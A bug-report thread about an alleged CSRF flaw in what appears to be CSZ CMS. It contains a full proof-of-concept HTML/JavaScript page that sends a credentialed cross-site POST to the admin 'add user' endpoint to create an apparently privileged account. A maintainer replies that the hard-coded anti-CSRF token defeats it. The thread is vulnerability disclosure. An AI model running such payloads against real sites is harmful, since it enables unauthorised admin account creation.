There is a CSRF vulnerability that can add an administrator account
RitaWWang opened this issue · comments
RitaWWang commented
After the administrator has logged in, open the following page
poc:
one.html --- adds an administrator
<!-- CSRF proof-of-concept attached to the report: a page that, when opened in
     a browser already holding an admin session, posts a pre-built "add user"
     form to the admin users endpoint. Kept verbatim as the reproduction; the
     inline notes explain what each part relies on, why it does not generalise
     (the csrf_csz value is fixed) and which server-side controls stop it. -->
<body>
<!-- Rewrites the address bar to "/" without navigating, so the visible URL
     does not show the PoC page name. -->
<script>history.pushState('', '', '/')</script>
<script>
// Builds and sends a single multipart/form-data POST to the admin "add user"
// endpoint. Every field value, including the anti-CSRF token, is hard-coded.
function submitRequest()
{
var xhr = new XMLHttpRequest();
// Hard-coded to the reporter's local install path.
xhr.open("POST", "http:\/\/localhost\/cszcms-master\/admin\/users\/new\/add", true);
// A fixed boundary is declared here and reused verbatim in the hand-built body below.
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykobVwTQR7Qxut2B0");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
// Sends the browser's cookies for the target origin with the request; this is
// what lets the victim's existing admin session authorise the POST.
// NOTE(review): a session cookie marked SameSite=Lax or Strict would not be
// attached to this cross-site request, independently of the CSRF token check.
xhr.withCredentials = true;
var body = "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
// csrf_csz is the application's anti-CSRF field. The value below is a static
// token copied from the reporter's own session. A cross-origin page cannot
// read the victim's current token, so this PoC only succeeds if the server
// accepts this exact value (i.e. the token is never regenerated). With a
// random per-session or per-request token the server should reject it.
"Content-Disposition: form-data; name=\"csrf_csz\"\r\n" +
"\r\n" +
"f34972c37ae66af1cf3355b95a25e347\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
// Account fields for the user being created; all fixed sample values.
"Content-Disposition: form-data; name=\"name\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"test3@test3.com\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"con_password\"\r\n" +
"\r\n" +
"test3\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
// group=1 and active=1 are the values the reporter used; presumably the
// administrator group id and the "enabled" flag -- confirm against the
// users form in the admin UI.
"Content-Disposition: form-data; name=\"group\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"active\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"te\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"st\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"year\"\r\n" +
"\r\n" +
"1929\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"month\"\r\n" +
"\r\n" +
"02\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"day\"\r\n" +
"\r\n" +
"02\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"gender\"\r\n" +
"\r\n" +
"male\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"address\"\r\n" +
"\r\n" +
"123\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"15826597895\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
// Empty file part with no filename; no file content is sent.
"Content-Disposition: form-data; name=\"file_upload\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundarykobVwTQR7Qxut2B0--\r\n";
var aBody = new Uint8Array(body.length);
// Copies the body string into a byte array one code unit at a time (the
// content above is all ASCII) so the exact boundary framing is sent
// unchanged; a FormData object would choose its own boundary instead.
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<!-- Manual trigger: the request is only sent when the button is clicked. -->
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>```
Cskaza Bassist commented
It does not work at all, because you don't know the csrf_csz key on the next submit; it's random.